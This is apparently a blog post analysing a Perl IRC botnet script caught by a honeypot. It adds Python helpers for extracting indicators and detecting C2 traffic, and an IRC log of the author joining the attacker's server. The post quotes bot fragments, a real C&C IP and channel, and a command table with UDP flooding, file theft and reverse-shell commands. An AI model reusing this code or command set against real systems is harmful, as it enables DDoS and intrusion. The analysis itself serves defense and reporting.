Botnet analysis based on IRC network

With one of my many honeypots active around the world wide web, I discovered an interesting script written in the famous Perl programming language. This Perl script is malware used to remotely control a machine, opening what is technically called a backdoor. If this malicious program runs on multiple machines, there is a possibility that the attacker has created a botnet.

First, a botnet is a network controlled by a botmaster and composed of devices infected with specialized malware, called bots or zombies ("computer zombies").

Internet-connected devices with vulnerabilities in their infrastructure can sometimes become part of a botnet even without the malware installed. Through the backdoor, the botmaster can control the system via remote access. Infected computers can thus launch attacks, such as Distributed Denial of Service (DDoS), against other systems, or perform other illicit operations.

How it works is relatively simple. Once the machine has been infected, the malware has to listen for the attacker's remote instructions. There is therefore a kind of node, called the C&C (command and control), which gives the "orders" executed by the infected machines.

And there we have the first problem: the centralization of the control point, the C&C. The central node has to be safe, out of the reach of ISPs and of applications such as firewalls and antivirus that might notice and block the attack. The authors use various techniques to try to make themselves "invisible" to the user and to the firewall.

So the attacker's solution is easy: use a decentralized network. No, I'm not talking about using blockchain for a botnet (even if it's a funny idea). Some hackers (if they can be called that) use peer-to-peer protocols, and others use IRC. And it is IRC that I will discuss.

In fact, the malicious program listens for commands by connecting to a private channel or private chat on an open IRC network. Through that channel, the author is able to control all the infected systems listening on it. The unknown attacker may control tens of thousands of them and, with a single order, request screenshots, credentials and much more.

The program

The program is a clear example of an attempt to add the infected machine to a botnet. In this post we will analyze the implemented code step by step. At the beginning of the script we find interesting variables used to connect to the IRC service.

my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.205");

@mast3rs looks like an unknown array, and only at the end will we understand what it might be; @hostauth seems to indicate some kind of authentication; @admchan specifies an IRC channel, while @server defines the IP of the IRC server to which the machine must connect.

In this excerpt, we have further confirmation of using an IRC socket to communicate with the attacker.

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);

The IRC nickname is generated by joining an element of the @nickname array with a random number.

my @nickname = ("b");
sub getnick {
        return "$nickname[rand scalar @nickname]".int(rand(20000));
}
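As an added example (not the bot's code and not part of the original post), here is a small Python helper a defender can run over a copy of the script to pull out the configuration lists shown above, so the C&C address, channel and scan ports can be blocked and reported. The embedded excerpt is constructed from the lines quoted in this post; the helper assumes the bot keeps its settings as Perl list assignments of the form `my @name = (...)`. It also derives, from the nickname prefix and the 0..19999 range used by getnick, a regex for spotting the bot's nicks on the IRC server.

```python
import re
from typing import Dict, List

# Constructed excerpt mirroring the configuration lines quoted in the post
# (values are the ones shown on the page; the rest of the bot is not reproduced).
SAMPLE_SCRIPT = r'''
my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.205");
my @nickname = ("b");
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
'''

# A Perl list assignment: my @name = ( ... );
LIST_ASSIGN = re.compile(r'my\s+@(\w+)\s*=\s*\((.*?)\)\s*;', re.S)
# Single- or double-quoted string literals inside the list body.
QUOTED = re.compile(r'"([^"]*)"|\'([^\']*)\'')


def perl_lists(src: str) -> Dict[str, List[str]]:
    """Return every `my @name = (...)` list in the script as name -> values."""
    out: Dict[str, List[str]] = {}
    for name, body in LIST_ASSIGN.findall(src):
        out[name] = [a or b for a, b in QUOTED.findall(body)]
    return out


def extract_iocs(src: str) -> dict:
    """Map the bot's configuration lists to indicators worth blocking/reporting.

    The list names (server, admchan, mast3rs, hostauth, nickname, portas)
    are those used by the script analysed in the post.
    """
    lists = perl_lists(src)
    return {
        "c2_servers": lists.get("server", []),
        "c2_channels": lists.get("admchan", []),
        "master_nicks": lists.get("mast3rs", []),
        "auth_hosts": lists.get("hostauth", []),
        "nick_prefixes": lists.get("nickname", []),
        "scan_ports": sorted({int(p) for p in lists.get("portas", [])}),
    }


def bot_nick_regex(prefixes: List[str]):
    """Regex matching nicks produced by getnick(): prefix + int(rand(20000)).

    rand(20000) yields 0..19999, so the numeric suffix is one to five digits.
    """
    alts = "|".join(re.escape(p) for p in prefixes)
    return re.compile(rf"^(?:{alts})\d{{1,5}}$")


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_SCRIPT)
    for key, value in iocs.items():
        print(f"{key}: {value}")
    print("bot nick pattern:", bot_nick_regex(iocs["nick_prefixes"]).pattern)
```

The nick regex is deliberately loose (a single letter followed by digits will also match some legitimate users), so treat it as a hunting aid to combine with the server and channel indicators rather than as a blocking rule on its own.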

Once the machine is connected to IRC, the program is ready to receive instructions. The attacker (who is an operator on IRC) sends the command that triggers a given function. Each function has an associated command, matched with a regex. Here is a summary table.

| Command | Example | How it works |
|---|---|---|
| ps IP | ps 127.0.0.1 | Scans the IP for open ports. The ports are hard-coded in the script (array @portas). |
| nmap IP initial_range final_range | nmap 127.0.0.1 27 40 | Scans the specified IP for open ports. The function supports a port range. |
| rm | rm | Clean-up: removes the malware. |
| version | version | Prints the malware version. |
| download file | download home.txt | Downloads a file from the infected device. |
| udp IP port time (ms) | udp 127.0.0.1 20 400 | Sends a flood-based attack via UDP packets. |
| back IP port | back 171.2.19.201 80 | Installs a reverse shell. |

For example, with the "ps" command the infected device performs a port scan to find out whether any ports are open (the ports are defined in the @portas array). The nmap command does the same thing, but over a specified range of ports.

my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

This code checks whether each port is open: $scansock is true only when the TCP connection to the port succeeds.

foreach my $porta (@portas) {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
    if ($scansock) {
        ....
    }
}

If $scansock is valid, the script sends a private message to the IRC target stored in $printl:

sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
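The command grammar in the table and the "Found: port/Open" reply give a network defender something concrete to alert on. As an added example (not from the post and not the bot's code), the Python below parses IRC PRIVMSG lines and flags those that match the bot's command syntax or its scan report; the traffic lines are constructed for the example, modelled on the table's examples and on the sendraw call above, and the IRC framing assumed is the standard `:prefix PRIVMSG target :text` form.

```python
import re
from typing import List, Optional, Tuple

# Constructed IRC traffic (not a capture): lines 1, 4 and 5 mimic operator
# commands from the table, line 2 mimics the bot's "Found:" reply, and
# line 3 is ordinary chat that must not trigger an alert.
SAMPLE_TRAFFIC = [
    ":z!z@localhost PRIVMSG #ssh :ps 127.0.0.1",
    ":b1523!b@198.51.100.7 PRIVMSG z :Found: 22/Open",
    ":alice!alice@example.net PRIVMSG #chat :hello everyone",
    ":w!w@localhost PRIVMSG #ssh :nmap 127.0.0.1 27 40",
    ":x!x@localhost PRIVMSG #ssh :download home.txt",
]

IP = r"\d{1,3}(?:\.\d{1,3}){3}"

# One pattern per command in the bot's grammar (see the summary table).
COMMANDS = {
    "ps": re.compile(rf"^ps\s+{IP}$"),
    "nmap": re.compile(rf"^nmap\s+{IP}\s+\d+\s+\d+$"),
    "rm": re.compile(r"^rm$"),
    "version": re.compile(r"^version$"),
    "download": re.compile(r"^download\s+\S+$"),
    "udp": re.compile(rf"^udp\s+{IP}\s+\d+\s+\d+$"),
    "back": re.compile(rf"^back\s+{IP}\s+\d+$"),
}

# The bot's port-scan report: "Found: <port>/Open"
BOT_REPORT = re.compile(r"^Found:\s*(\d+)/Open$")

# Standard IRC PRIVMSG framing: ":nick!user@host PRIVMSG target :text"
IRC_LINE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S*)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


def parse_privmsg(line: str) -> Optional[Tuple[str, str, str]]:
    """Split a PRIVMSG line into (sender nick, target, message text)."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    return (m["nick"], m["target"], m["text"]) if m else None


def classify(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (kind, nick, detail) for C2-looking messages, None otherwise.

    kind is "c2_command" (detail = command name) or "bot_report" (detail = port).
    """
    parsed = parse_privmsg(line)
    if not parsed:
        return None
    nick, _target, text = parsed
    for name, pattern in COMMANDS.items():
        if pattern.match(text):
            return ("c2_command", nick, name)
    report = BOT_REPORT.match(text)
    if report:
        return ("bot_report", nick, report.group(1))
    return None


def scan_traffic(lines) -> List[Tuple[str, str, str]]:
    """Run classify() over a stream of IRC lines and keep the alerts."""
    return [alert for alert in (classify(line) for line in lines) if alert]


if __name__ == "__main__":
    for kind, nick, detail in scan_traffic(SAMPLE_TRAFFIC):
        print(f"{kind:12} from {nick:8} -> {detail}")
```

The bare-word commands ("rm", "version") will also match innocent chat, so in practice weight those as low confidence and raise the severity only when the message is seen on the channel or server extracted from the script, or when a "Found:" report follows the command.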

Reporting

Once you find malware like this, you should report the IPs related to the possible illegal activity, and the malware itself. In all likelihood the attack will be (more or less) stopped, since there is usually a connected domain or IP and the facts can be reported to the relevant third parties.

Then I tried to join this IRC server.

16:31 [912]  -!- **Irssi:** Connection to **91.191.19.205** established
16:31 [912]  -!- !unreal.org  *** Looking up your hostname...
16:31 [912]  -!- !unreal.org  *** Couldn't resolve your hostname; using your IP address instead
16:31 [912]  -!- /list LIST command
16:31 [912]  -!- Channel User 
16:32 [912]  -!- #ircd 1132 [+sntu]
16:32 [912]  -!- #aka 85 [+sntu]
16:32 [912]  -!- #ph1 261 [+sntu]
16:32 [912]  -!- #ssh 46 [+sntu]
